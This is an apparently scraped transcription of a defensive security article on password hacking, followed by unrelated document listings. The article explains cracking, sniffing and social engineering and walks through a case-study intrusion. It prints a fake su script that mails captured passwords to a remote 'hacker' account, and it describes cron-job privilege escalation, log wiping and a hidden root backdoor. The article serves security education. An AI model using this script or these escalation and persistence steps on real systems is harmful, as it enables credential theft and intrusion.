Password Hacking Stephen James Payoff

Size: px
Start display at page:

Download "86-10-16 Password Hacking Stephen James Payoff"

Transcription

1 Password Hacking Stephen James Payoff Hackers have developed numerous techniques over the years for guessing or obtaining passwords and breaking into systems. This article discusses the methods that hackers use to gain access to a system and it includes a case study of one hacker's successful intrusion into a corporate computer system. A list of steps for management and system adminstrators to take to establish a more secure system is also provided. Introduction The first challenge that a hacker faces is to obtain or to guess a valid User ID and password combination for a targeted system. Once these pieces of information are obtained, the hacker can gain access to the corporate system and can attempt to extend his or her current level of access. It is vital to understand and appreciate the importance of proper password control. A system with inadequate password controls is an invitation for hackers to gain access. Hackers have developed numerous techniques over the years for guessing or obtaining passwords. Many automated techniques have been developed to expedite the process and are readily available on the Internet. This article discusses the methods that hackers use to gain access to a system and it includes a case study of one hacker's successful intrusion into a computer system. Methods of Access Hackers are resourceful, and they have devised numerous ways by which to gain illegal access to a system. Brute Force Attacks Regardless of the reasons behind an attack, the primary target of a hacker is the /etc/passwd file. UNIX systems inherently require that the /etc/passwd file be world readable. This feature allows any user with access to the command line to copy the password file. Once a hacker gets hold of this file, he or she has a list of valid user accounts. Then it is easy to create a program to guess passwords; a simple one can be written in approximately 60 lines of C code or 40 lines of PERL. Many password guessing programs are freely available on the Internet. Alternatively, a hacker could sit at a terminal and manually attempt to guess passwords. Password Crackers If the targeted site has not installed a shadow password file (that is, if the encrypted passwords are stored in the /etc/passwdfile itself), a hacker's job is already halfway complete. The hacker has access not only to a list of valid user accounts but also to a list of corresponding passwords. He or she could simply run a password-cracking program such as Crack. Crack works by encrypting a standard dictionary using crypt, the encryption algorithm used by UNIX systems. It then compares each encrypted dictionary word against the entries in the password file until it finds a match. Crack is freely available through an anonymous File Transfer Protocol (FTP) from FTP.CERT.ORGat /pub/tools/crack.

2 Keystroke Logging It takes less than 30 seconds to type in a short script to capture sign-on sessions. A hacker can install the program onto a workstation with a disk. It works in the background and captures every sign-on session, based on trigger key words. The hacker can then remotely read the captured keystrokes and gain access to the system. This technique is extremely simple and almost always goes unnoticed. An example of a simple program that captures switch-user (su) sign-on sessions and transmits the captured data to a user called hacker on a remote system called faraway is as follows: stty -echo echo Password: \c read X echo stty echo echo $1 $X sendmail faraway!hacker & sleep 1 echo Sorry rm su This program will write Sorry to the user's screen after the user enters his or her password. The user will probably assume that he or she has mistyped the password and will attempt to sign on again. Packet Sniffing The Internet offers a range of network monitoring tools including network analyzers and packet sniffers. These work by capturing packets of data as they are transmitted along a communications segment. A hacker needs only to gain physical access to a Personal Computer (PC) connected to a Local Area Network (LAN) and load this software. Alternatively, the hacker could attach a laptop to a network port in a remote corner of the office and start capturing data packets. Knowing that network traffic is almost never encrypted, the hacker stands a good chance that he or she will capture valid user account and password combinations, especially between 8:00 a.m. and 9:00 a.m. Tcpdump, an effective tool for UNIX systems, is used to monitor network traffic and is freely available through an anonymous FTP from FTP.EE.LBL.GOV at tcpdump2.2.1.tar.z. Social Engineering A hacker identifies a user account that has not been used for a certain period of time (such as two weeks). He or she ensures that it belongs to a user that the administrator is not likely to know by voice. Accounts belonging to interstate users or users in another building are often targeted for this reason. Once the hacker has chosen a target, he or she assumes the user's identity and calls the administrator or the help desk, explaining that he or she has forgotten the password to the account. The hacker requests that the password be reset and the administrator or help desk obliges, giving the hacker the new password over the phone. The policies in many companies enable this method to be highly effective. Default Passwords Most UNIX software comes out of the box with standard system user accounts each with a default password already defined within /etc/passwd. Examples of system accounts

3 include adm, sys, llp, or mail. Very often, UNIX systems come with a default guest account as well. It is common knowledge that the default password for this account is usually guest. Hackers have huge hit lists of these default passwords for almost every type of operating system and for most commercial application packages as well. To speed up the break-in, they often include these hit lists as part of their password guessing programs. Security Measures Knowing how hackers gain access enables system administrators to create barriers against intrusion. By developing and strictly following specific procedures, companies can put up a strong defense. Password Length and Construct Rules The system should force users to select passwords that are at least five characters in length, consisting of a mix of alphabetic, numeric, and special characters. Most systems have the ability to enforce password length and construct rules. It is incumbent upon the administrator to define these parameters correctly. Passwords that are Difficult to Guess Where possible, the system should be configured to prevent users from selecting passwords that are easy to guess. That is, it should force users to select passwords that would withstand a brute force or crack attack. Examples of passwords that are easy to guess include words from a dictionary or other values (such as names) that are easily attributable to a user. A number of programs are available on the Internet that can assist administrators in ensuring that users select passwords that will withstand a hacker attack. These include programs such as npasswd and passwd+, which check user passwords employing the following criteria: A minimum number of characters. Elimination of trivial passwords such as aaaa. Use of mixed case. Nonoccurrence in a dictionary. Nonuse of personal information. The password is compared against the user's account name, the host name, the user's first and last names, and against various information about the user returned by the finger command. Permutations of this information(such as backward spelling) are also checked. The npasswd program is available through an anonymous FTP from ftp.cc.utexas.edu in the compressed tar file /pub/npasswd/npasswd.tar.z. Invalid Sign-on Attempts The administrator should ensure that the system locks out the user account after a predefined number of invalid sign-on attempts. Many secure sites configure their systems so that the account is locked out after three failed log-on attempts and remains locked until

4 the administrator resets it. This standard helps guard against a manual or automated brute force attack, as the hacker is given only three chances to guess the correct password. Invalid sign-on attempts should also be logged and regularly followed up. A series of failed log-on attempts may suggest that a hacker is attempting a brute force attack. The administrator can then take preventive measures to guard against such an attack. Password Expiration The system should be configured so that users are forced to change their passwords at regular intervals throughout the year. Some systems enforce this by expiring user passwords at predeined intervals, allowing users a grace period (such as five days or logons) to change their passwords before their accounts become locked. Security Policy and User Education One of the most important controls that the administrator can implement is a formal and enforced data security policy. At a minimum, the documented policy should include statements on: The value of information and software to the organization. The extent and reliance placed by the organization on the continued integrity and availability of its information and system resources. The responsibility and accountability of individual users. Management requirements with respect to security administration. The system administrator's day-to-day functions. Password management controls. Restart and recovery procedures. Review of system logs and audit trails. Program change procedures and guidelines. Copyright enforcement policies. Virus detection and prevention procedures. Senior management's endorsement of the policies and procedures. The security policy should be enforced by means of regular user security awareness seminars and circulated memoranda. A Hacker's Confession The best way to safeguard a system is to understand the methods a professional hacker uses. The following is a case study of a real system penetration. It is an account of an actual assignment in which an individual was contracted to hack into a major Australian organization's computer system during December It outlines the techniques the

5 hacker used to penetrate the system successfully. System administrators can use this information to ensure that their own systems cannot be compromised in the same way. For the purposes of the case study, the organization has been renamed PRIDE Corporation. All names and identification (such as user IDs, passwords, and modem numbers) have been changed so that they do not represent the real organization. December 3, 23:17 The hacker is at home. He has spent the last hour surfing the Internet looking through the alt.2600 newsgroup. He has just found a short daemon dialer program that someone has posted on the bulletin board. Having downloaded and scanned it, he starts examining it. (It is good practice to scan all software downloaded from the Internet in case it has been infected by a virus.) After a bit of experimentation, he decides to use it to find modem numbers for the PRIDE Corporation. He looks in the telephone book and determines that the telephone number for PRIDE is prefixed 358-XXXX. Assuming that the company also uses that prefix for their modem numbers, he sets the daemon dialer to ring all numbers in the range to December 4, 07:38 The daemon dialer finishes its task in about six hours. It writes an output file in which it has logged all the modem tones it detected in the given range. All the hacker has to do now is to dial these modem numbers to determine whether any of them belong to the PRIDE Corporation. Some daemon dialers will automatically dial the numbers; this particular version requires the hacker to do this task manually. The hacker tries the first one. It rings and connects right away, indicating that the system does not have a call-back function. It does not attempt to confirm the user's identity by asking for a modem password. The hacker knows he has dialed the PRIDE Corporation as soon as the sign-on screen appears: Welcome to the PRIDE Corporation login: December 4, 09:20 The hacker has accomplished the first step of his hack: he has gained access to the signon screen. It is as though he has physical access to a terminal within the PRIDE building, except that he can commit the crime in the privacy of his own home and at his leisure. The next step is to penetrate the system. He decides on a brute force attack. He attempts the well-known default system accounts such as rootand guest and tries entering the account names as passwords. This approach is unsuccessful, because the administrator has apparently changed the default passwords. Given that he does not know any legitimate user IDs, the hacker decides to try a little social engineering. He calls the PRIDE Corporation's switchboard and explains that he is typing a letter to the system administrator, but he needs to make sure that he is addressing it to the correct person. Certainly, sir. The system administrator is Steve Smith, the operator tells him. He now has concrete information to fuel his attack. Over the next several hours, he tries a variety of user ID and password combinations such as: smith/smith; steve/steve; smiths/smiths; smiths/pride; smiths/pride1; and ssmith/steve.

6 December 4, 11:15 The hacker finds the right combination: smiths/dec95.it appears that the system at PRIDE forces users to change their passwords every month and Steve Smith, the administrator, uses a password in the format mmmyy. The hacker knows that this piece of information will be useful if he has to guess the administrator's password again in another month. Less than four hours have passed since the hacker started and he has already found the company's modem numbers, the administrator's name, and a valid user ID and password combination. All he has to do now is sign on and see what he can do. He signs on as Steve Smith and is granted access to the command line. He takes a quick tour of the file system to see if he can find anything of interest. The first place he visits is the /etc directory to determine whether PRIDE has a shadow password file. The hacker does a quick list of the directory and is pleased to see that there is no password shadowing. Password shadowing is a feature of C2 level security where encrypted passwords are kept in a separate file to which only the root user has access. The hacker takes a look at the /etc/passwd file and notices a couple of accounts with blank values in the password field. Even though their shell is restricted to a menu, he takes note of these accounts so that he can use them to sign on later. (See Exhibit 1.) An Extract of the /etc/passwd File root:5tyhgh6dsf,2.z9:0:0::/: daemon:*:1:2::/tmp: uucp:hgyu74fds5b.9:3::/usr/spool/uucppublic:/usr/lib/uucp smiths:nbh7hg3gft,2.z9:10:12:steve Smith:/u/smiths:/bin/sh pastelc:jh7jhgbf90,2.z9:11:12:cindy Pastel:/u/pastelc:/bin/sh rhodeg::12:15:guy Rhodes:/u/rhodeg:/bin/accmenu fitzz::13:15:zane Fitzpatrick:/u/fitzz:/bin/accmenu December 4, 11:52 Now that the hacker has penetrated the PRIDE system, he wants to extend his levels of access to superuser. To do this, he has to obtain the root password. The root account is the most powerful user within UNIX and has unrestricted access to all files within the system. If he can crack this account, he can do anything to PRIDE's computer resources. The hacker signs in again as Steve Smith and decides to search through the file system for all set user ID (SUID) root files. Files that have been assigned SUID root privileges effectively possess root(superuser) rights whenever they are executed. Anyone who gains access to a SUID root file can modify the file so that it executes a potentially destructive root command. The hacker enters the following command: find /-user root -perm print. This action comes back with a list of five different files. The hacker then performs a list of each of the SUID files to determine whether they were writeable. He discovers that they are writeable only by root. Next he tries a different tactic. He looks through the system to find the root cron table. Cron is a UNIX feature that automates job scheduling. Jobs scheduled within the root cron table are executed with root privileges. Once the hacker finds it, he performs a list of each executable file within the cron table. To his surprise, one of the scheduled jobs has a file access mode enabling Steve Smith to write to the file. He immediately edits the file and inserts the line: /bin/sh -i. By looking at the parameters defined within the cron table, the hacker knows that the file is scheduled to run at 21:00 every night and that the next time it runs, it will execute his line of script, enabling him to gain superuser access.

7 December 4, 21:10 He signs on as Steve Smith and is presented with the root sign-on prompt. His trick has worked: he now has total control of the system. His first step is to eliminate all the audit trails. He quickly reviews and modifies the accounting files and removes his entry from the root crontab file. The hacker then removes all traces of his failed switch user (su) attempts from the /usr/adm/sulog. As root, the hacker has full access to the /etc/passwdfile, so he decides to create a backdoor entry for future use. He creates an account called johnb and assigns it a user ID number of zero (superuser). He hides it among the hundreds of other accounts so that it will not be easily discovered. The hacker then creates a number of entries in the /etc/hosts.equiv file and root's.rhost file. This tactic will enable him to sign on to (and from) other systems as root without having to enter a password. At this stage, he could completely erase the entire file system or add a virus or Trojan horse. (A virus is a program that potentially destroys or corrupts program and data files). Instead, the hacker decides to add a sniffer routine to the system log-on scripts. Sniffer software captures system users' sign-on sessions and, depending on the sophistication of the program, transmits the captured data to a remote system. In about 40 lines of C, he writes a routine that captures users' passwords whenever they sign on. This action will enable him to identify and use other users' passwords at any time in the future in case his root access is detected and revoked. Alternatively, he can run software, such as Crack, against the password file or create additional accounts (such as the johnbaccount) for future use. Status Check It had taken less than 24 hours for the hacker to gain root access to the PRIDE computer system. It had not required any particularly technical skills. It is often the more simple oversights, such as those previously discussed in the case study, that enable hackers to penetrate systems. To provide a reasonable level of system security, company management should institute basic system controls, such as the following, at a minimum: Perform regular system security reviews to identify control weaknesses that may enable unauthorized persons to gain access to computer resources. Develop a documented data security policy that is sponsored and supported by senior management and enforced through effective system administration techniques. Employ a competent and security-aware systems administrator. Ensure that employees are made security-aware through formal and ongoing education. Ensure that all accounts on the operating and application systems have passwords that are regularly changed. Revoke entries for unused accounts from password files. Force users to select passwords that are difficult to guess. Run software, such as Crack, to identify and change weak passwords before a hacker does.

8 Change all vendor default passwords when software is installed. Consider one-time passwords for access from external networks and for access to sensitive resources. This precaution helps overcome sniffer software risks. Ensure that accounts are locked out after a prescribed number of sign-on failures. Institute a procedure in which sign-on failures are logged, reviewed, and followed up. Restrict retrieval of the password file so it may not be accessed through Trivial File Transfer Protocol. Confirm that the network configuration files (such as /etc/hosts.equiv, /etc/hosts.lpd and /*/rhosts files) do not contain a + (plus sign). Ensure that appropriate file permissions have been set throughout the entire file system. Do not create or allow SUID shell scripts, particularly SUID root. If the network is connected to other less secure networks, consider installing a firewall. Care must be taken to configure each firewall component properly, including route, gateway machines, and communication protocols. Keep all system components (i.e., computers, communications equipment, backup media, and security-sensitive hardcopy output) in a physically secure environment. Keep up to date with all Computer Emergency Response Team (Computer Emergency Response Team) advisories and patches. Conclusion Password security is one of the most critical controls that can be implemented within a systems environment to protect corporate information and computer resources. The Internet offers a wide range of tools that can assist the administrator in enforcing adequate password controls. Passwords provide a line of security against computer hacker attacks; the stronger the password procedures, the stronger the defense against a hacker attack. Author Biographies Stephen James Stephen James is one of Australia's computer security lead experts who specializes in UNIX and Internet security as well as hacker studies. He is a senior consultant with Price Waterhouse (Sydney).

86-10-15 The Self-Hack Audit Stephen James Payoff

86-10-15 The Self-Hack Audit Stephen James Payoff 86-10-15 The Self-Hack Audit Stephen James Payoff As organizations continue to link their internal networks to the Internet, system managers and administrators are becoming increasingly aware of the need

More information

SPICE EduGuide EG0015 Security of Administrative Accounts

SPICE EduGuide EG0015 Security of Administrative Accounts This SPICE EduGuide applies to HSC information systems, specifically Administrative login accounts; (aka Admin accounts) and the faculty, staff and students who use them. Admin accounts are logon IDs and

More information

NEW JERSEY STATE POLICE EXAMPLES OF CRIMINAL INTENT

NEW JERSEY STATE POLICE EXAMPLES OF CRIMINAL INTENT Appendix A to 11-02-P1-NJOIT NJ OFFICE OF INFORMATION TECHNOLOGY P.O. Box 212 www.nj.gov/it/ps/ 300 Riverview Plaza Trenton, NJ 08625-0212 NEW JERSEY STATE POLICE EXAMPLES OF CRIMINAL INTENT The Intent

More information

Pension Benefit Guaranty Corporation. Office of Inspector General. Evaluation Report. Penetration Testing 2001 - An Update

Pension Benefit Guaranty Corporation. Office of Inspector General. Evaluation Report. Penetration Testing 2001 - An Update Pension Benefit Guaranty Corporation Office of Inspector General Evaluation Report Penetration Testing 2001 - An Update August 28, 2001 2001-18/23148-2 Penetration Testing 2001 An Update Evaluation Report

More information

a) Encryption is enabled on the access point. b) The conference room network is on a separate virtual local area network (VLAN)

a) Encryption is enabled on the access point. b) The conference room network is on a separate virtual local area network (VLAN) MIS5206 Week 12 Your Name Date 1. Which significant risk is introduced by running the file transfer protocol (FTP) service on a server in a demilitarized zone (DMZ)? a) User from within could send a file

More information

Host Security. Host Security: Pro

Host Security. Host Security: Pro Host Security 1 Host Security: Pro Maintaining strong security on host avoids the crunchy shell around soft, chewy center problem If perimeter security fails, network is often wide open to attack May rely

More information

PREPARED BY: AUDIT PROGRAM Author: Lance M. Turcato. APPROVED BY: Logical Security Operating Systems - Generic. Audit Date:

PREPARED BY: AUDIT PROGRAM Author: Lance M. Turcato. APPROVED BY: Logical Security Operating Systems - Generic. Audit Date: A SYSTEMS UNDERSTANDING A 1.0 Organization Objective: To ensure that the audit team has a clear understanding of the delineation of responsibilities for system administration and maintenance. A 1.1 Determine

More information

Network and Host-based Vulnerability Assessment

Network and Host-based Vulnerability Assessment Network and Host-based Vulnerability Assessment A guide for information systems and network security professionals 6600 Peachtree-Dunwoody Road 300 Embassy Row Atlanta, GA 30348 Tel: 678.443.6000 Toll-free:

More information

INTRODUCTION TO PENETRATION TESTING

INTRODUCTION TO PENETRATION TESTING 82-02-67 DATA SECURITY MANAGEMENT INTRODUCTION TO PENETRATION TESTING Stephen Fried INSIDE What is Penetration Testing? Terminology; Why Test? Types of Penetration Testing; What Allows Penetration Testing

More information

2. From a control perspective, the PRIMARY objective of classifying information assets is to:

2. From a control perspective, the PRIMARY objective of classifying information assets is to: MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected

More information

Nixu SNS Security White Paper May 2007 Version 1.2

Nixu SNS Security White Paper May 2007 Version 1.2 1 Nixu SNS Security White Paper May 2007 Version 1.2 Nixu Software Limited Nixu Group 2 Contents 1 Security Design Principles... 3 1.1 Defense in Depth... 4 1.2 Principle of Least Privilege... 4 1.3 Principle

More information

HIPAA Privacy & Security Health Insurance Portability and Accountability Act

HIPAA Privacy & Security Health Insurance Portability and Accountability Act HIPAA Privacy & Security Health Insurance Portability and Accountability Act ASSOCIATE EDUCATION St. Elizabeth Medical Center Origin and Purpose of HIPAA In 2003, Congress enacted new rules that would

More information

Determine if the expectations/goals/strategies of the firewall have been identified and are sound.

Determine if the expectations/goals/strategies of the firewall have been identified and are sound. Firewall Documentation Develop background information about the firewall(s) in place: Segment diagrams Software Hardware Routers Version levels Host names IP addresses Connections Specific policies for

More information

USFSP Network Security Guidelines

USFSP Network Security Guidelines USFSP Network Security Guidelines Table of Contents I. Access to Data II. Workstations and Personal Computers A. Computer Viruses B. Software C. Hardware D. Storage Media III. Local Area Networks (LANs)

More information

Getting a Secure Intranet

Getting a Secure Intranet 61-04-69 Getting a Secure Intranet Stewart S. Miller The Internet and World Wide Web are storehouses of information for many new and legitimate purposes. Unfortunately, they also appeal to people who like

More information

My FreeScan Vulnerabilities Report

My FreeScan Vulnerabilities Report Page 1 of 6 My FreeScan Vulnerabilities Report Print Help For 66.40.6.179 on Feb 07, 008 Thank you for trying FreeScan. Below you'll find the complete results of your scan, including whether or not the

More information

31 Ways To Make Your Computer System More Secure

31 Ways To Make Your Computer System More Secure 31 Ways To Make Your Computer System More Secure Copyright 2001 Denver Tax Software, Inc. 1. Move to more secure Microsoft Windows systems. Windows NT, 2000 and XP can be made more secure than Windows

More information

Using PowerBroker Identity Services to Comply with the PCI DSS Security Standard

Using PowerBroker Identity Services to Comply with the PCI DSS Security Standard White Paper Using PowerBroker Identity Services to Comply with the PCI DSS Security Standard Abstract This document describes how PowerBroker Identity Services Enterprise and Microsoft Active Directory

More information

Information Technology Cyber Security Policy

Information Technology Cyber Security Policy Information Technology Cyber Security Policy (Insert Name of Organization) SAMPLE TEMPLATE Organizations are encouraged to develop their own policy and procedures from the information enclosed. Please

More information

Did you know your security solution can help with PCI compliance too?

Did you know your security solution can help with PCI compliance too? Did you know your security solution can help with PCI compliance too? High-profile data losses have led to increasingly complex and evolving regulations. Any organization or retailer that accepts payment

More information

Boston University Security Awareness. What you need to know to keep information safe and secure

Boston University Security Awareness. What you need to know to keep information safe and secure What you need to know to keep information safe and secure Introduction Welcome to Boston University s Security Awareness training. Depending on your reading speed, this presentation will take approximately

More information

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder. CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files

More information

Web Plus Security Features and Recommendations

Web Plus Security Features and Recommendations Web Plus Security Features and Recommendations (Based on Web Plus Version 3.x) Centers for Disease Control and Prevention National Center for Chronic Disease Prevention and Health Promotion Division of

More information

CS 356 Lecture 17 and 18 Intrusion Detection. Spring 2013

CS 356 Lecture 17 and 18 Intrusion Detection. Spring 2013 CS 356 Lecture 17 and 18 Intrusion Detection Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists

More information

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:

More information

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped

More information

Desktop and Laptop Security Policy

Desktop and Laptop Security Policy Desktop and Laptop Security Policy Appendix A Examples of Desktop and Laptop standards and guidelines 1. Implement anti-virus software An anti-virus program is necessary to protect your computer from malicious

More information

Worms, Trojan Horses and Root Kits

Worms, Trojan Horses and Root Kits Worms, Trojan Horses and Root Kits Worms A worm is a type of Virus that is capable of spreading and replicating itself autonomously over the internet. Famous Worms Morris Internet worm (1988) Currently:

More information

What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.

What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. AGENDA Current State of Information Security Data Breach Statics Data Breach Case Studies Why current

More information

Identification and Authentication on FCC Computer Systems

Identification and Authentication on FCC Computer Systems FCC Computer Security TABLE OF CONTENTS Desk Reference 1 INTRODUCTION...1 Identification and Authentication on FCC Computer Systems 1.1 PURPOSE...1 1.2 BACKGROUND...1 1.3 SCOPE...2 1.4 AUTHORITY...2 2

More information

SECURITY DOCUMENT. BetterTranslationTechnology

SECURITY DOCUMENT. BetterTranslationTechnology SECURITY DOCUMENT BetterTranslationTechnology XTM Security Document Documentation for XTM Version 6.2 Published by XTM International Ltd. Copyright XTM International Ltd. All rights reserved. No part of

More information

Network Security: From Firewalls to Internet Critters Some Issues for Discussion

Network Security: From Firewalls to Internet Critters Some Issues for Discussion Network Security: From Firewalls to Internet Critters Some Issues for Discussion Slide 1 Presentation Contents!Firewalls!Viruses!Worms and Trojan Horses!Securing Information Servers Slide 2 Section 1:

More information

How Spyware and Anti-Spyware Work

How Spyware and Anti-Spyware Work 22 PART 1 INTERNET SECURITY CHAPTER 3 How Spyware and Anti-Spyware Work 23 THESE days, the biggest danger you face when you go onto the Internet might be spyware a type of malicious software that can invade

More information

The Ten Most Important Steps You Can Take to Protect Your Windows-based Servers from Hackers

The Ten Most Important Steps You Can Take to Protect Your Windows-based Servers from Hackers The Ten Most Important Steps You Can Take to Protect Your Windows-based Servers from Hackers University of California, Riverside Computing and Communications Author: Joel Nylander Document Goal This document

More information

Network- vs. Host-based Intrusion Detection

Network- vs. Host-based Intrusion Detection Network- vs. Host-based Intrusion Detection A Guide to Intrusion Detection Technology 6600 Peachtree-Dunwoody Road 300 Embassy Row Atlanta, GA 30348 Tel: 678.443.6000 Toll-free: 800.776.2362 Fax: 678.443.6477

More information

UCLA Policy 401 Minimum Security Standards for Network Devices

UCLA Policy 401 Minimum Security Standards for Network Devices UCLA Policy 401 Minimum Security Standards for Network Devices Issuing Officer: Associate Vice Chancellor, Information Technology Responsible Dept: Office of Information Technology Effective Date: November

More information

Penetration Testing Report Client: Business Solutions June 15 th 2015

Penetration Testing Report Client: Business Solutions June 15 th 2015 Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com

More information

Windows Remote Access

Windows Remote Access Windows Remote Access A newsletter for IT Professionals Education Sector Updates Issue 1 I. Background of Remote Desktop for Windows Remote Desktop Protocol (RDP) is a proprietary protocol developed by

More information

REGULATIONS COMPLIANCE ASSESSMENT

REGULATIONS COMPLIANCE ASSESSMENT ALIX is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation. REGULATIONS COMPLIANCE ASSESSMENT BUSINESS

More information

Security Maintenance Practices. IT 4823 Information Security Administration. Patches, Fixes, and Revisions. Hardening Operating Systems

Security Maintenance Practices. IT 4823 Information Security Administration. Patches, Fixes, and Revisions. Hardening Operating Systems IT 4823 Information Security Administration Securing Operating Systems June 18 Security Maintenance Practices Basic proactive security can prevent many problems Maintenance involves creating a strategy

More information

System Security Policy Management: Advanced Audit Tasks

System Security Policy Management: Advanced Audit Tasks System Security Policy Management: Advanced Audit Tasks White Paper October 6, 2005 2005 Altiris Inc. All rights reserved. ABOUT ALTIRIS Altiris, Inc. is a pioneer of IT lifecycle management software that

More information

SANS Institute First Five Quick Wins

SANS Institute First Five Quick Wins #1 QUICK WIN- APPLICATION WHITELISTING SANS Critical Controls: #2: Inventory of Authorized and Unauthorized Software 1) Deploy application whitelisting technology that allows systems to run software only

More information

IT Best Practices Audit TCS offers a wide range of IT Best Practices Audit content covering 15 subjects and over 2200 topics, including:

IT Best Practices Audit TCS offers a wide range of IT Best Practices Audit content covering 15 subjects and over 2200 topics, including: IT Best Practices Audit TCS offers a wide range of IT Best Practices Audit content covering 15 subjects and over 2200 topics, including: 1. IT Cost Containment 84 topics 2. Cloud Computing Readiness 225

More information

Getting Started Guide

Getting Started Guide Page 2 of 9 Introduction This guide is designed to provide you with the information you need to complete your Payment Gateway account set up and begin processing live payment transactions. As a quick overview,

More information

IS TEST 3 - TIPS FOUR (4) levels of detective controls offered by intrusion detection system (IDS) methodologies. First layer is typically responsible for monitoring the network and network devices. NIDS

More information

The City of New York

The City of New York The Policy All passwords and personal identification numbers (PINs) used to protect City of New York systems shall be appropriately configured, periodically changed, and issued for individual use. Scope

More information

Data Management Policies. Sage ERP Online

Data Management Policies. Sage ERP Online Sage ERP Online Sage ERP Online Table of Contents 1.0 Server Backup and Restore Policy... 3 1.1 Objectives... 3 1.2 Scope... 3 1.3 Responsibilities... 3 1.4 Policy... 4 1.5 Policy Violation... 5 1.6 Communication...

More information

Written Information Security Plan (WISP) for. HR Knowledge, Inc. This document has been approved for general distribution.

Written Information Security Plan (WISP) for. HR Knowledge, Inc. This document has been approved for general distribution. Written Information Security Plan (WISP) for HR Knowledge, Inc. This document has been approved for general distribution. Last modified January 01, 2014 Written Information Security Policy (WISP) for HR

More information

Hacking Database for Owning your Data

Hacking Database for Owning your Data Hacking Database for Owning your Data 1 Introduction By Abdulaziz Alrasheed & Xiuwei Yi Stealing data is becoming a major threat. In 2012 alone, 500 fortune companies were compromised causing lots of money

More information

A Decision Maker s Guide to Securing an IT Infrastructure

A Decision Maker s Guide to Securing an IT Infrastructure A Decision Maker s Guide to Securing an IT Infrastructure A Rackspace White Paper Spring 2010 Summary With so many malicious attacks taking place now, securing an IT infrastructure is vital. The purpose

More information

Pointsec Enterprise Encryption and Access Control for Laptops and Workstations

Pointsec Enterprise Encryption and Access Control for Laptops and Workstations Pointsec Enterprise Encryption and Access Control for Laptops and Workstations Overview of PC Security Since computer security has become increasingly important, almost all of the focus has been on securing

More information

Cent ralized Out -Of-Band Aut hent ic at ion Syst em. Authentication Security for the 21 st Century

Cent ralized Out -Of-Band Aut hent ic at ion Syst em. Authentication Security for the 21 st Century Cent ralized Out -Of-Band Aut hent ic at ion Syst em Security for the 21 st Century Presented by: Southeast Europe Cybersecurity Conference Sophia, Bulgaria September 8-9, 2003 Introduction Organizations

More information

Quick Start Guide. Cerberus FTP is distributed in Canada through C&C Software. Visit us today at www.ccsoftware.ca!

Quick Start Guide. Cerberus FTP is distributed in Canada through C&C Software. Visit us today at www.ccsoftware.ca! Quick Start Guide Cerberus FTP is distributed in Canada through C&C Software. Visit us today at www.ccsoftware.ca! How to Setup a File Server with Cerberus FTP Server FTP and SSH SFTP are application protocols

More information

Windows Client/Server Local Area Network (LAN) System Security Lab 2 Time allocation 3 hours

Windows Client/Server Local Area Network (LAN) System Security Lab 2 Time allocation 3 hours Windows Client/Server Local Area Network (LAN) System Security Lab 2 Time allocation 3 hours Introduction The following lab allows the trainee to obtain a more in depth knowledge of network security and

More information

Feedback Ferret. Security Incident Response Plan

Feedback Ferret. Security Incident Response Plan Feedback Ferret Security Incident Response Plan Document Reference Feedback Ferret Security Incident Response Plan Version 3.0 Date Created June 2013 Effective From 20 June 2013 Issued By Feedback Ferret

More information

INTERNET SECURITY: THE ROLE OF FIREWALL SYSTEM

INTERNET SECURITY: THE ROLE OF FIREWALL SYSTEM INTERNET SECURITY: THE ROLE OF FIREWALL SYSTEM Okumoku-Evroro Oniovosa Lecturer, Department of Computer Science Delta State University, Abraka, Nigeria Email: victorkleo@live.com ABSTRACT Internet security

More information

Network Protection and Information Security Policy

Network Protection and Information Security Policy Network Protection and Information Security Policy Purpose... 1 Scope... 1 Policy... 1 Responsibilities... 1 System Access Control... 2 System Privileges... 4 Establishment Of Access Paths... 6 Computer

More information

Information Security Policy

Information Security Policy Information Security Policy Touro College/University ( Touro ) is committed to information security. Information security is defined as protection of data, applications, networks, and computer systems

More information

PASSWORD MANAGEMENT. February 2008. The Government of the Hong Kong Special Administrative Region

PASSWORD MANAGEMENT. February 2008. The Government of the Hong Kong Special Administrative Region PASSWORD MANAGEMENT February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without

More information

AIR FORCE ASSOCIATION S CYBERPATRIOT NATIONAL YOUTH CYBER EDUCATION PROGRAM UNIT FIVE. Microsoft Windows Security. www.uscyberpatriot.

AIR FORCE ASSOCIATION S CYBERPATRIOT NATIONAL YOUTH CYBER EDUCATION PROGRAM UNIT FIVE. Microsoft Windows Security. www.uscyberpatriot. AIR FORCE ASSOCIATION S CYBERPATRIOT NATIONAL YOUTH CYBER EDUCATION PROGRAM UNIT FIVE Microsoft Windows Security www.uscyberpatriot.org AIR FORCE ASSOCIATION S CYBERPATRIOT NATIONAL YOUTH CYBER EDUCATION

More information

Remote PC Guide for Standalone PC Implementation

Remote PC Guide for Standalone PC Implementation Remote PC Guide for Standalone PC Implementation Updated: 2007-01-22 The guide covers features available in NETLAB+ version 3.6.1 and later. IMPORTANT Standalone PC implementation is no longer recommended.

More information

